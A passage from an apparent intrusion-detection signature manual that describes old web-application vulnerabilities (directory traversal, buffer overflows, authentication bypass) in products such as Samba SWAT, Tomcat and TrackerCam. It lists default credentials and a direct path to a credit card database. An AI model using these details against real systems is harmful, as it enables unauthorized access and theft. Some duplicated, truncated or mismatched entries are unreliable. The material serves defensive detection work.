SSiteWare Editor Desktop Directory Traversal Vulnerability
Signature Description: SiteWare Editor's Desktop is a web-based administration tool for manipulating
ScreamingMedia content on a SiteWare web server. Screaming Media SiteWare 3.1, Screaming Media SiteWare 3.0 2,
Screaming Media SiteWare 3.0 1, Screaming Media SiteWare 3.0, Screaming Media SiteWare 2.5 01, Screaming
Media SiteWare 2.5 are vulnerable versions. The SiteWare Editor is a Web-based remote administration interface for
the SiteWare server. A malicious user(remote attacker) could send a URL request containing "dot dot" sequences (/../)
to the SiteWare server, after received this type of requests it is not validating properly the user supplied, then there is
chance to traverse directories and retrieve arbitrary files from the Web server. This signature detects when the attacker
access "SWEditServlet" because there is no parameter information.
169
Signature ID: 1260
SiteWare Editor Desktop Directory Traversal Vulnerability
Signature Description: SiteWare Editor's Desktop is a web-based administration tool for manipulating
ScreamingMedia content on a SiteWare web server. Screaming Media SiteWare 3.1, Screaming Media SiteWare 3.0 2,
Screaming Media SiteWare 3.0 1, Screaming Media SiteWare 3.0, Screaming Media SiteWare 2.5 01, Screaming
Media SiteWare 2.5 are vulnerable versions. The SiteWare Editor is a Web-based remote administration interface for
the SiteWare server. A malicious user(remote attacker) could send a URL request containing "dot dot" sequences (/../)
to the SiteWare server, after received this type of requests it is not validating properly the user supplied, then there is
chance to traverse directories and retrieve arbitrary files from the Web server.
Signature ID: 1261
SalesLogix eViewer DoS Vulnerability
Signature Description: SalesLogix eViewer is a web application integrated with the SalesLogix 2000 package.
SalesLogix Corporation eViewer 1.0 is vulnerable version to denial of service. eViewer will not perform authorization
on administrative commands if they are requested directly in the URL. Therefore, the will cause the slxweb.dll process
to shutdown. Possibly other commands aside from 'shutdown' could be performed by a remote user as well. Although
the slxweb.dll process will restart once a new query or session is issued, continually requesting the URL above will
cause a denial of service.
Signature ID: 1262
Samba Web Administration Tool Base64 Decoder Buffer Overflow Vulnerability
Signature Description: Samba Web Administration Tool(SWAT) is a tool that may be used to configure Samba or just
to obtain useful links to important reference materials such as the contents of this book as well as other documents that
have been found useful for solving Windows networking problems. Samba Samba 3.0.4 -r1, Samba Samba 3.0.4,
Samba Samba 3.0.3, Samba Samba 3.0.2a and Samba Samba 3.0.2 are vulnerable to stack-based buffer overflow. This
issue is due to a failure of the application to properly validate buffer boundaries when copying user-supplied input into
a finite buffer.Successful exploitation of this issue will allow a remote, unauthenticated attacker to execute arbitrary
code on the affected computer with the privileges of the affected process; Samba typically runs with superuser
privileges.
Signature ID: 1263
Samba SWAT Authorization port 901 overflow vulnerability
Signature Description: Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 is vulnerable to buffer overflow.
This issue is due to a failure of the application to properly validate buffer boundaries when copying user-supplied input
into a finite buffer. A successful exploitation of this issue will allow a remote, unauthenticated attacker to execute
arbitrary code on the affected computer with the privileges of the affected process , Samba typically runs with
superuser privileges. This issue is fixed in Samba Samba 3.0.5. Update the Samba Samba 3.0.5 version to resolve this
issue.
170
Signature ID: 1264
Niti Telecom Caravan Business Server Remote Directory Traversal Vulnerability
Signature Description: Caravan Business Server is used to develop web applications. Niti Telecom Caravan Business
Server 2.00-03D is vulnerable to directory traversal attack. This versions is not validating the user supplied inputs
through the request URLs after received the request, so there is possible for an external user to perform a directory
traversal attack against the server by manipulating the parameter "fname" in the Sample_showcode.html file. finally the
remote attacker may view any files readable by the web server using '../' escape sequences in URI requests.
Signature ID: 1265
Secure Authentication Bypass Vulnerability
Bugtraq: 4621
Signature Description: Apache Software Foundation Apache 1.3.24, Apache Software Foundation Apache 1.3.23,
Apache Software Foundation Apache 1.3.22, Apache Software Foundation Apache 1.3.20, Apache Software
Foundation Apache 1.3.19 are vulnerable versions to gain accessing. These versions of software from SecureSite does
not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host
server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator.
Signature ID: 1266
Novell Groupwise Servlet Gateway Default Authentication Vulnerability
Signature Description: Novell Groupwise Servlet Gateway is a product that allows Java servlets to be run with
NetWare, using Novell JVM for NetWare v1.1.7b and NetWare Enterprise Web Server.A remote attacker may gain
access to the Servlet Manager interface by entering the default username/password. The default username is "servlet"
and the default password is "manager".Novell Groupwise Enhancement Pack 5.5 and Novell Groupwise 6.0 are prone
to this vulnerability.
Signature ID: 1267
SmartWin CyberOffice Shopping Cart 2.0 Client Information Disclosure Vulnerability
Signature Description: Smartwin Technology CyberOffice Shopping Cart is a shopping cart application for ecommerce enabled websites running Windows NT 4.0 or 2000.It is possible for a remote user to gain read access to the
_private directory on a website running CyberOffice Shopping Cart 2.0. By default the _private directory has world
readable permissions. The Microsoft Access Database which contains confidential client details (such as customer
orders and unencrypted credit card information) is stored in the _private directory and is thus accessible to attackers.An
attacker need only request "http://target/_private/shopping_cart.mdb" with a browser to access it.SmartWin Technology
CyberOffice Shopping Cart 2.0 is prone to this vulnerability.
Signature ID: 1268
Trend Micro InterScan eManager Buffer Overflow Vulnerability
content, and mail delivery. It can be managed through a web-based console interface. Trend Micro InterScan eManager
3.51 j and Trend Micro InterScan eManager 3.51 versions are vulnerable, these versions CGI components of eManager
171
contain a buffer overflow vulnerability, A malicious user will send a overly long arguments to SpamExcp.dll script,
then it could allow an attacker to execute arbitrary code within the Local System context. Then the attacker can
reconfigure its settings. Patches are available at vendor website.
Signature ID: 1269
Sun JavaServer default password login
Signature Description: By default, Sun JavaServer installs with a default password. The admin account has a password
of admin which is publicly known and documented. This allows attackers to trivially access the system. Users are
advised to change all default install passwords to a unique and secure password. When possible, change default
accounts to custom names as well.
Signature ID: 1270
Trend Micro InterScan eManager Buffer Overflow Vulnerability
content, and mail delivery. It can be managed through a web-based console interface. Trend Micro InterScan eManager
3.51 j and Trend Micro InterScan eManager 3.51 versions are vulnerable, these versions CGI components of eManager
contain a buffer overflow vulnerability, A malicious user will send a overly long arguments to TOP10.dll script, then it
could allow an attacker to execute arbitrary code within the Local System context. Then the attacker can reconfigure its
settings. Patches are available at vendor website.
Signature ID: 1271
Talentsoft Web+ Source Code Disclosure Vulnerability
Bugtraq: 1722
Signature Description: Talentsoft's Web+ web application server is a powerful and comprehensive development
language for use in creating web-based client/server applications. TalentSoft Web+ Server 4.6, TalentSoft Web+
Monitor 4.6 and TalentSoft Web+ Client 4.6 are vulnerable versions. After received the requests from remote user the
Talentsoft Web+ Source Code view does not perform stringent checks when validating the credentials of a client host
connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated
privileges to that of the administrator.
Signature ID: 1272
Apache Tomcat Servlet Path Disclosure Vulnerability
Signature Description: Apache Tomcat is an implementation of the Java Servlet and JavaServer Pages technologies.
The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process. Apache
Software Foundation Tomcat 4.1 and prior versions are vulnerable, these versions of Tomcat SnoopServlet servlet
does not validating properly the credentials of a client host connecting to the services offered on a host server. This can
lead to unauthorized access and possibly escalated privileges to that of the administrator. Patches are available at
sun website.
172
Signature ID: 1273
Apache Tomcat Servlet Path Disclosure Vulnerability
The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process. Apache
Software Foundation Tomcat 4.1 and prior versions are vulnerable, these versions of Tomcat TroubleShooter servlet
does not validating properly the credentials of a client host connecting to the services offered on a host server. This can
lead to unauthorized access and possibly escalated privileges to that of the administrator. Patches are available at sun
website.
Signature ID: 1274
Apache Tomcat Servlet Malformed URL JSP Source Disclosure vulnerability
Apache Tomcat powers numerous large-scale, mission-critical web applications across a diverse range of industries and
organizations. Apache Software Foundation Tomcat 4.0, Apache Software Foundation Tomcat 3.2.1 and BEA Systems
Weblogic Server 5.1 are vulnerable versions, these versions are not validating properly the user request, then there is
chance to view source code. A remote attacker can send a GET request that does not end with an HTTP protocol
specification (HTTP/1.0 or HTTP/1.1) to receive the source code of the requested JSP file, and possibly obtain database
passwords and file names. Apply patch HPTL_00010.
Signature ID: 1275
Eagletron TrackerCam 'fn' Parameter 'ComGetLogFile.php3' Script Directory Traversal
Vulnerability
Signature Description: TrackerCam is the official software for TrackerPod, a robotic tripod used to provide movement
to a webcam but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to a
directory traversal vulnerability. The vulnerability is due to improper validation of 'ComGetLogFile.php3' script
provided as an argument for 'fn' parameter. By default TrackerCam runs on TCP Port 8090 and acts as a webserver. A
remote attacker can send a specially crafted request containing '..' sequences for the 'ComGetLogFile.php3' argument
and view arbitrary files outside the webroot directory. Restrict access to port 8090 for trusted clients only.
Signature ID: 1276
Eagletron TrackerCam 'fn' Parameter 'ComGetLogFile.php3' Script Log Information
Disclosure Vulnerability
to a webcam but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to an
information disclosure vulnerability via 'ComGetLogFile.php3' script. By default TrackerCam runs on TCP Port 8090
and acts as a webserver. A remote attacker can send HTTP request for the 'ComGetLogFile.php3' script with a known
log filename as argument via 'fn' parameter and view the log contents which may disclose sensitive information.
Restrict access to port 8090 for trusted clients only.
173
Signature ID: 1277
Eagletron TrackerCam 'User-Agent' Field Buffer Overflow Vulnerability
to a webcam but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to a
buffer overflow while handling 'User-Agent' HTTP header field. By default TrackerCam runs on TCP Port 8090 and
acts as a webserver. A remote attacker can send HTTP request with an overly long 'User-Agent' HTTP header
containing more than 216 bytes to overflow the buffer and execute arbitrary code on the system. Restrict access to port
8090 for trusted clients only.
Signature ID: 1278
Eagletron TrackerCam Content-Length Field Denial of Service Vulnerability
to a web cam but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to a
denial of service when HTTP requests with a negative or large Content-Length field value. By default TrackerCam runs
on TCP Port 8090 and acts as a web server. A remote attacker can send specially crafted HTTP request with a negative
or large Content-Length field value. When multiple requests (at least 300) of this type are received the application may
crash. Restrict access to port 8090 for trusted clients only.
Signature ID: 1279
Eagletron TrackerCam Long PHP Argument Buffer Overflow Vulnerability
to a web cam but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to a
buffer overflow caused by improper handling of argument for any PHP script of TrackerCam. By default TrackerCam
runs on TCP Port 8090 and acts as a web server. A remote attacker can send HTTP request with an overly long (more
than 256 bytes) PHP argument to overflow the buffer and execute arbitrary code on the system. Restrict access to port
8090 for trusted clients only.
Signature ID: 1281
Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability
Bugtraq: 1057
Signature Description: Trend Micro OfficeScan is an antivirus software program which is deployable across an entire
network. Trend Micro OfficeScan For Microsoft SBS 4.5, Trend Micro OfficeScan Corporate Edition for Windows NT
Server 3.13, Trend Micro OfficeScan Corporate Edition for Windows NT Server 3.11, Trend Micro OfficeScan
Corporate Edition for Windows NT Server 3.5, Trend Micro OfficeScan Corporate Edition for Windows NT Server 3.0
are vulnerable versions. A remote attacker could send a specially-crafted request to the server, after received this type
of the requests, the Trend Micro OfficeScan applications do not perform stringent checks when validating the
credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and
possibly escalated privileges to that of the administrator.
174
Signature ID: 1282
Trend InterScan VirusWall Remote Reconfiguration Vulnerability
Signature Description: Trend Micro's InterScan VirusWall blocks viruses, malicious applets and ActiveX objects at the
Internet gateway, and provides real-time scanning for all inbound and outbound SMTP, HTTP and FTP file transfers.
Trend Micro InterScan VirusWall for Windows NT 3.51, Trend Micro InterScan VirusWall for Windows NT 3.5 and
Trend Micro InterScan VirusWall for Windows NT 3.4 are vulnerable versions, these versions are not performing
stringent checks when validating the credentials of a client host connecting to the services offered on a host server. A
malicious user(remote attacker) could send a specially crafted uri request, after received this type of request these
vulnerable versions are not validating properly the user given input, this can lead to unauthorized access and possibly
escalated privileges to that of the administrator. Then the attacker will make configuration changes.
Signature ID: 1283
Trend InterScan VirusWall Remote Reconfiguration Vulnerability
Signature Description: Trend Micro's InterScan VirusWall blocks viruses, malicious applets and ActiveX objects at the
Internet gateway, and provides real-time scanning for all inbound and outbound SMTP, HTTP and FTP file transfers.
Trend Micro InterScan VirusWall for Windows NT 3.51, Trend Micro InterScan VirusWall for Windows NT 3.5 and
Trend Micro InterScan VirusWall for Windows NT 3.4 are vulnerable versions, these versions are not performing
stringent checks when validating the credentials of a client host connecting to the services offered on a host server.
A malicious user(remote attacker) could send a specially crafted uri request, after received this type of request these
vulnerable versions are not validating properly the user given input, this can lead to unauthorized access and
possibly escalated privileges to that of the administrator. Then the attacker will make configuration changes.
Signature ID: 1284
Apache WebDAV Directory Listings Vulnerability
Signature Description: WebDAV a web publishing protocol , in certain configurations of Apache, such as those in
SuSE 6.0-7.0 and RedHat 6.2-7.0, have WebDAV enabled and misconfigured in such a way to allow directory listings
of the entire server file structure -- specifically, WebDAV was enabled on the Document Root of the web server. Since
subdirectories of a WebDAV-enabled directory are automatically enabled as well, this caused the entire web server to
have WebDAV enabled. Since a directory, or its parent directory, must have been specifically declared for WebDAV to
be enabled, configuration errors should be straightforward to find and correct.
Signature ID: 1285
Webtrends HTTP probe Vulnerability
Signature Description: WebTrends Security Analyzer is used to secure intranet and extranet by scanning remote and
local systems to discover known security vulnerabilities. When unchecked these vulnerabilities, then the attacker can
access sensitive information, damage or gain control of device.
Signature ID: 1286
Banner engine Cross-Site Scripting Vulnerability
Industry ID: CVE-2006-3519 CVE-2000-0426 CVE-2000-0332 CVE-2002-0749 Bugtraq: 18793,1175,1164,4579
Nessus: 11748
175
Signature Description: Native Solutions, The Banner Engine (tbe) 4.0 and prior are vulnerable to cross-site scripting. A
remote attacker could exploit this vulnerability using the 'adminlogin', 'adminpass' or 'text' parameter to execute script
in a victim's Web browser within the security context of the hosting Web site, allowing the attacker to steal the victim's
cookie-based authentication credentials.
Signature ID: 1287
Microsoft IE Crafted URL Cross Domain Cookie Disclosure vulnerability
Signature Description: Windows Internet Explorer (MSIE), commonly abbreviated to IE, is a series of graphical web
browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems. Microsoft,
Internet Explorer 4.0, Microsoft, Internet Explorer 4.0.1, Microsoft, Internet Explorer 5.0 and Microsoft, Internet
Explorer 5.01 are vulnerable to Cross Domain Cookie Disclosure. An attacker by embedding a specially-crafted URL
with certain escape characters, the malicious Web operator can trick Internet Explorer into thinking the pages
originated from another domain, allowing the Web site operator to access cookies from the spoofed domain.
Signature ID: 1288
Avenger's News System Directory Traversal Vulnerability
Signature Description: Avenger's News System (ANS) is a simple form-based web site management tool written in
Perl, this tool is usefull to creating an easy to update and easy tomaintain web site. Instead of constantly uploading new
news pages and wrestling with HTML. It will run on most Unix and Linux variants. Avenger's News System 2.11 and
earlier versions are vulnerable, A malicious user(remote attacker) will send a request with dot-dot-slash (../) sequences
in the 'p'(plugin) parameter, these vulnerable versions are does not filter dot-dot-slash (../) sequences from web
requests, making it prone to directory traversal attacks. As a result, the attacker may display the contents of arbitrary
web-readable files. No remedy is available. It will generate log whenever accessing the ans.pl file.
Signature ID: 1289
Avenger's News System Directory Traversal Vulnerability
Signature Description: Avenger's News System (ANS) is a simple form-based web site management tool written in
Perl, this tool is usefull to creating an easy to update and easy tomaintain web site. Instead of constantly uploading new
news pages and wrestling with HTML. It will run on most Unix and Linux variants. Avenger's News System 2.11 and
earlier versions are vulnerable, A malicious user(remote attacker) will send a request with dot-dot-slash (../) sequences
in the 'p'(plugin) parameter, these vulnerable versions are does not filter dot-dot-slash (../) sequences from web
requests, making it prone to directory traversal attacks. As a result, the attacker may display the contents of arbitrary
web-readable files. No remedy is available.
Signature ID: 1290
Sun AnswerBook2 Unauthorized Administrative Script Access
Signature Description: Sun Microsystems Solaris AnswerBook2 versions 1.4.2 and prior contains a flaw that may
allow a malicious user to create an arbitrary account. This vulnerability is due to a lack of authentication checks for
certain scripts within the administration interface of AnswerBook2. A successful exploitation of this vulnerability
allows an attacker to access sensitive information on the vulnerable system. This issue is fixed in AnswerBook2 version
1.4.2 patched or higher. Administrators are advised to update 1.4.2 patched or later version to resolve this issue.
176
Signature ID: 1291
Answerbook2 arbitrary command execution
Signature Description: Sun Microsystems Solaris AnswerBook2 versions 1.4.2 and prior contains a flaw that may
allow a malicious user to create an arbitrary account. This vulnerability is due to the insufficient input validation for cgi
scripts in the administration interface of Answerbook2. By sending a specially crafted URL request with shell meta
characters to port 8888. A successful exploitation of this vulnerability allows an attacker to access sensitive information
on the vulnerable system. This issue is fixed in AnswerBook2 version 1.4.2 patched or higher. Administrators are
advised to update 1.4.2 patched or later version to resolve this issue.
Signature ID: 1292
Apache 1.3.20 Possible Directory Index Disclosure attempt vulnerability
The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process. Apache 1.3.20
and prior versions are velnerable, this version could cause directory contents to be disclosed. A malicious user(remote
attacker) to obtain a directory listing, caused by a vulnerability when the "Multiviews" option is enabled, the attacker
could send a specially-crafted URL containing the "M=D" query string to bypass the index page and obtain a listing of
the directory contents. An attacker could use this information to launch further attacks against the affected server.
Signature ID: 1295
CafeLog b2 Weblog Tool 2.06pre4 arbitrary command execution vulnerability
Signature Description: Weblog has posts that appear on the home page which are written by a group of people, instead
of by a single author. The Multi-Author Weblog Tool makes it easy to use Radio to create a multi-authored weblog.
Cafelog b2 0.6 pre is vulnerable to execute arbitrary codes, this version do not perform stringent checks when
validating the credentials of a client host connecting to the services offered on a host server. This can lead to
unauthorized access and possibly escalated privileges to that of the administrator.
Signature ID: 1296
Backup files access Vulnerability
Signature Description: Backup utility in the Microsoft Windows operating system helps to protect data if hard disk
fails or files are accidentally erased due to hardware or storage media failure. By using Backup, you can create a
duplicate copy of the data on hard disk. The Backup files can contain script sources, configuration files or other
sensitive information. This event detects when an attacker access to the backup file.
Signature ID: 1297
Bad HTTP/1.1 request Vulnerability
Signature Description: HTTP(Hypertext Transfer Protocol) is an application protocol. It is used for transferring files
(text, graphic images, sound, video, and other multimedia files) on the World Wide Web. This rule will trigger when an
attacker send an request as GET / HTTP/1.1\r\n\r\n without "Host" parameter, then the web servers will respond like as
HTTP/1.1 400 Bad request. This successful exploitation can allow an attacker to further attacks.
177
Signature ID: 1298
PCCS Mysql Database Admin Tool Username/Password Exposure Vulnerability
Signature Description: The PCCS-Linux MySQL Database Admin Tool is a Web-based front-end to the MySQL
database server written in PHP. PCCS-Linux MySQLDatabase Admin Tool 1.2.4, PCCS-Linux MySQLDatabase
Admin Tool 1.2.3 are vulnerable to Gain access. The default installation installs an include file in a directory that can
be accessed by the web server. This include file, dbconnect.inc, contains information such as the username and
password used to connect to the database in plain text format that can be disclosed if it is requested via http. PCCS
MySQL DB Admin Tool v1.2.3 and prior are affected by this issue. Update the PCCS-Linux MySQLDatabase Admin
Tool 1.2.5 version.
Signature ID: 1299
Netscape Communicator Long Argument Vulnerability
Signature Description: Netscape Navigator and Netscape are the names for the proprietary web browser, and the
flagship product of the Netscape Communications Corporation. Netscape Navigator/Communicator 4.7 is vulnerable to
buffer overflow, By creating a specially-crafted URL containing an overly long argument to an .asp, .cgi, .html, or .pl
file and hosting it on a Web page or sending it within an email message, a remote attacker can overflow a buffer and
cause the program to crash or execute arbitrary commands on the victim's system, once the URL link is clicked.
Signature ID: 1300
NetScape Browser Buffer Overflow Vulnerability while parsing HTML code
Signature Description: Netscape Navigator and Netscape are the names for the proprietary web browser, and the
flagship product of the Netscape Communications Corporation. Netscape Navigator/Communicator 4.7 and Netscape
4.75 are vulnerable, these allowing attackers to execute arbitrary code. A malicious user(remote attacker) could send a
specially crafted request to the server this request contains overly long password value, after received the request it is
not validating properly the user given inputs, so while processing the request buffer overflow will occur, then the
remote attacker execute arbitrary code on a visiting user's computer resulting in a loss of confidentiality and integrity.
Signature ID: 1301
PHP File Upload GLOBALS Overwrite Vulnerability
Signature Description: PHP is a widely-used general-purpose scripting language that is especially suited for Web
development and can be embedded into HTML. PHP versions 4.x up to 4.4.0 and 5.x up to 5.0.5 are susceptible to a
vulnerability that allows attackers to execute arbitrary PHP code on the target system when 'register_globals' is turned
on. A remote user can send a form-data POST request containing a fileupload field with the name "GLOBALS" to
cause the $GLOBALS array to be overwritten. This allow the attackers to execute arbitrary PHP code or further exploit
latent vulnerabilities in PHP scripts.
Signature ID: 1302
PHP File Upload GLOBAL Variable Overwrite Vulnerability
178
Signature Description: PHP is a widely-used general-purpose scripting language that is especially suited for Web
development and can be embedded into HTML. PHP 4.x up to 4.4.0 and 5.x up to 5.0.5 versions are prone to a
vulnerability that allows attackers to overwrite the GLOBAL variable via HTTP POST requests. This vulnerability will
occur by the weakness in the file upload code, that allows modifying (i.e., overwriting) the GLOBALS array and
bypass security protections of PHP applications via a multipart/form-data POST request with a "GLOBALS" fileupload
field, when register_globals is turned on. Overwriting this array can lead to unexpected security holes in code assumed
secure.
Signature ID: 1303
Mozilla/Netscape/Firefox Browsers Domain Name Buffer Overflow Vulnerability
Signature Description: Mozilla products, including the Mozilla Suite, and Mozilla Firefox are vulnerable to a heap
overflow in the way they handle URLs containing certain IDN encoded host names. The vulnerability occurs because
of an error in the conversion of a host name consisting of Unicode "soft hyphen" characters (U+00AD) to the UTF-8
character set. The vulnerability can be exploited by convincing a user to view an HTML document which sends a
specially-crafted HTML file containing the 0xAD character in the domain name. A successful attack may result in a
crash of the application or the execution of arbitrary code. To protect from this attack Mozilla users are advised to
patch their systems.Firefox 1.0.6 and 1.5 Beta 1 are vulnerable to this issue. Mozilla 1.7.11 and Netscape 8.0.3.3 and
7.2 are affected as well.
Signature ID: 1304
Mozilla/Netscape/Firefox Browsers Domain Name Buffer Overflow Vulnerability
Signature Description: Mozilla Firefox is a free and open source web browser descended from the Mozilla Application
Suite, managed by the Mozilla Corporation. Mozilla products, including the Mozilla Suite, and Mozilla Firefox are
vulnerable to a heap overflow in the way they handle URLIs containing certain IDN encoded hostnames. The
vulnerability occurs because of an error in the conversion of a hostname consisting of Unicode "soft hyphen" characters
(U+00AD) to the UTF-8 character set. The vulnerability can be exploited by convincing a user to view an HTML
document which sends a specially-crafted HTML file containing the 0xAD character in the domain name. A successful
attack may result in a crash of the application or the execution of arbitrary code. To protect from this attack Mozilla
users are advised to patch their systems. Firefox 1.0.6 and 1.5 Beta 1 are vulnerable to this issue. Mozilla 1.7.11 and
Netscape 8.0.3.3 and 7.2 are affected as well.
Signature ID: 1305
RealNetworks RealPlayer/HelixPlayer RealPix Format String Vulnerability
Signature Description: The Helix Player is the Helix Community's open source media player for consumers. The
RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several non-open source
components including RealAudio/RealVideo, MP3 etc., A format string vulnerability exists in Helix Player (10.0.0 - 5)
that allows a remote attacker to execute code on victim's computer. The vulnerability specifically exists because of the
improper usage of a formatted printing function. This vulnerability can be exploited by a specially crafted RealPix (.rp)
or RealText (.rt) file. Administrators are advised to patch up the machines using vulnerable Real Player or Helix Player.
Signature ID: 1306
RealNetworks RealPlayer/HelixPlayer RealPix Format String Vulnerability
179
Signature Description: The Helix Player is the Helix Community's open source media player for consumers. The
RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several non-open source
components including RealAudio/RealVideo, MP3 etc., Real HelixPlayer and RealPlayer 10 version contains format
string vulnerability. Thse vulnerable version allows a remote attacker to execute code on victim's computer. The
vulnerability specifically exists because of the improper usage of a formatted printing function. The server could send
cpecially crafted .rp and .rt extension files, the vulnerability can be exploited by a specially crafted RealPix (.rp) or
RealText (.rt) file. Administrators are advised to patch up the machines using vulnerable Real Player or Helix
Player.
Signature ID: 1307
Apache 2.0 Path Disclosure Vulnerability
Signature Description: Apache HTTP Server is a very popular freely available web server that runs on a variety of
operating systems, including UNIX, Linux, and Microsoft Windows (Win32). Apache 2.0 through 2.0.39 on Windows,
OS2, and Netware are vulnerable versions, these versions of Apache HTTP Server could allow a remote attacker to
obtain the full path to the Apache installation directory, caused by a vulnerability in the multiview type map
negotiation. A malicious user(remote attacker) will send sends a specially-crafted URL request appended with .var, the
attacker could cause an error message to be returned that would contain the full path to the installation directory. This
malicious user(remote-attacker) could use this vulnerability to obtain sensitive information, such as the operating
system and server version. This information could then be used to launch further attacks against the affected Web
server.
Signature ID: 1308
Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
operating systems, including UNIX, Linux, and Microsoft Windows (Win32). Apache 2.0 through 2.0.44 and prior
versions are vulnerable, thse version allows remote attackers to cause a denial of service. The malicious user(remote
attacker) will send request with large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each
linefeed. After received this type of request it cant not properly so memory consumption, it cause a denial of service.
Exploitation of this vulnerability may allow an attacker to consume all available system resources, resulting in a denialof-service condition.
Signature ID: 1309
ESignal v7 remote buffer overflow Vulnerability
Bugtraq: 9978
Signature Description: ESignal is the nation's leading provider of real-time financial and market information. eSignal is
a popular platform for institutional and professional traders. eSignal is a market data solution bundled for best value for
small to mid-size institutional investors that also includes additional optional services. eSignal eSignal 7.6 and eSignal
eSignal 7.5 versions existed stack-based buffer overflow vulnerability. A remote attacker will send invalid request,
eSignal main application "WinSig.exe" listens for incoming data requests on tcp port 80. While parsing requests, it
suffers from classic stack-based buffer overflow(due to invalid bounds checking), when parameter string is about 1040
characters long, the Overflow occurs in Specs.dll and EIP is fully controllable, as the function return address on the
stack is completely overwritten. This vulnerability may allows execution of arbitrary code.
180
Signature ID: 1310
Mozilla Firefox iframe.contentWindow.focus Deleted Object Reference Vulnerability
Signature Description: Mozilla Firefox is a free, open source, cross-platform graphical web browser. Firefox provides a
facility to load the web pages in sidebar web panel. Mozilla Firefox version 1.5.0.2 is prone to a vulnerability when
rendering malformed JavaScript content. An attacker could exploit this issue to cause the browser to fail or potentially
execute arbitrary code. The vulnerability is caused by a memory corruption vulnerability that can occur when
"designMode" is set to "on". A successful attack can result in execution of arbitrary code or cause a victim's browser to
crash by creating a malicious Web page that uses the contentWindows.focus() JavaScript control to reference a deleted
object.
Signature ID: 1311
Basilix Webmail Incorrect File Permissions Vulnerability
Signature Description: Webmail is to check e-mail from any computer with Internet access without downloading
messages to the local computer. We can also send attachments, create an address book and signature file, filter mail
using rules, and use folders to sort and manage messages. Murat Arslan, BasiliX Webmail 0.9.7beta version is
vulnerable to directory traversal. Basilix is a PHP and IMAP based Webmail application that uses the MySQL
database server. If the Web server is not configured to recognize files with ".class" or ".inc" extensions as PHP scripts,
a remote attacker can send an HTTP request to view these files, which may contain sensitive data, such as the MySQL
password and username information.
Signature ID: 1312
BulletScript MailList bsml.pl Information Disclosure Vulnerability
Signature Description: BulletScript MailList is a cgi script used to handle mailing lists. A directory traversal
vulnerability exists in the BulletScript MailList software all versions, that may allow remote attackers to gain access to
sensitive information. A remote attacker could send a specially-crafted request to bsml.pl script with invalid values to
"action" parametr, then the attacker can gather information via these attacks may aid an attacker in mounting further
attacks against a vulnerable system and the affected users.
Signature ID: 1313
CPanel resetpass remote command execution Vulnerability
Signature Description: CPanel (control Panel) is a graphical web-based web-hosting control panel, designed to
simplify administration of websites. cPanel handles aspects of website administration in its interface. cPanel cPanel 9.1,
cPanel cPanel 9.0, cPanel cPanel 8.0, cPanel cPanel 7.0, cPanel cPanel 6.4.2 .STABLE_48, cPanel cPanel6.4.2, cPanel
cPanel 6.4.1, cPanel cPanel 6.4, cPanel cPanel 6.2, cPanel cPanel 6.0, cPanel cPanel 5.3, cPanel cPanel 5.0 are
vulnerable versions. An attacker could send a malicious URI request to the affected script, the attacker may then supply
shell metacharacters and arbitrary commands as a value for the affected variable. After received this type of the request
from the user not validating properly the user supplied data to the script that handles resetting user passwords, then
remote command execution is possible.
181
Signature ID: 1315
ICat Carbo Server File Disclosure Vulnerability
Signature Description: ICat Electronic Commerce Suite is an application which enables a user to create and manage
web based catalogues. carbo.dll in iCat Electronic Commerce Suite 3.0 allows remote attackers to read arbitrary files
via directory traversal using relative path. It is possible to access any object on the system. The attacker will send a
specially-crafted request with directory traversal sequence(../) as icatcommand parameter value. Successful exploitation
of this vulnerability may disclose sensitive information such as usernames and passwords and aid in the development of
further attacks.
Signature ID: 1317
Parent directory traversal Vulnerability
Signature Description: Cd, also known as chdir(change directory), is a command to change the current working
directory in operating systems such as Unix, DOS. 'cd..' Used to go back one directoy on the majority of all Unix shells.
This signature detects the command "cd..", an attacker can be attempting to access a read files beyond root directory.
Signature ID: 1318
HTTP Request with Negative Content-Length Vulnerability
Signature Description: This rule triggers when a malicious HTTP request contains negative value for Content-Length
field in the HTTP header. McAfee, ePolicy Orchestrator 3.0 is vulnerable to a buffer overflow. A remote attacker could
send an HTTP POST request with an invalid value in the Content-Length header, when McAfee ePolicy Orchestrator
recieves this type of requests it can not give responses the device will crash or possibly execute arbitrary code, so
finally the attacker could overflow buffer and cause the system to crash, or possibly execute arbitrary code on the
system.
Signature ID: 1319
NAI PGP Keyserver WebAdmin Interface Authentication Bypassing Vulnerability
Signature Description: Key server is a computer, typically running special software which provides keyss to users or
other programs. The users or programs can be working in that or another networked computer. KeyServer is the most
widely used network-independent software license manager for Macintosh and Windows-based computers. PGP,
Keyserver 7.0 and PGP, Keyserver 7.0.1 versions are vulnerable, these versions are vulnerable to a denial of service
attack, caused by a vulnerability in the default permissions of the Web interface. That allows a malicious user(remote
attacker) to access administrative features without authentication. The flaw is due to the server not validating input to
the "action" variable in the "console.exe" script. This may allow an attacker to manipulate administrative features and
configuration options.
Signature ID: 1320
Microsoft Site Server 3.0 Content Upload Denial of Service Vulnerability
Signature Description: Microsoft Site Server is a solution to the growing business of Internet-based commerce (or ecommerce). Site Server expanded on Merchant Server's functionality by annexing content management tools; which
182
would typically be involved, it was thought, in facilitating the management of Web-facing content. It is designed to run
on Microsoft Windows NT Server platforms. Microsoft Site Server (Commerce Edition) versions 3.0 SP4 i386 ,3.0 SP4
alpha,3.0 SP3 i386,3.0 SP3 alpha,3.0 SP2 i386,3.0 SP2 alpha,3.0 SP1 i386,3.0 SP1 alpha,3.0 i386,3.0 alpha,3.0 SP4
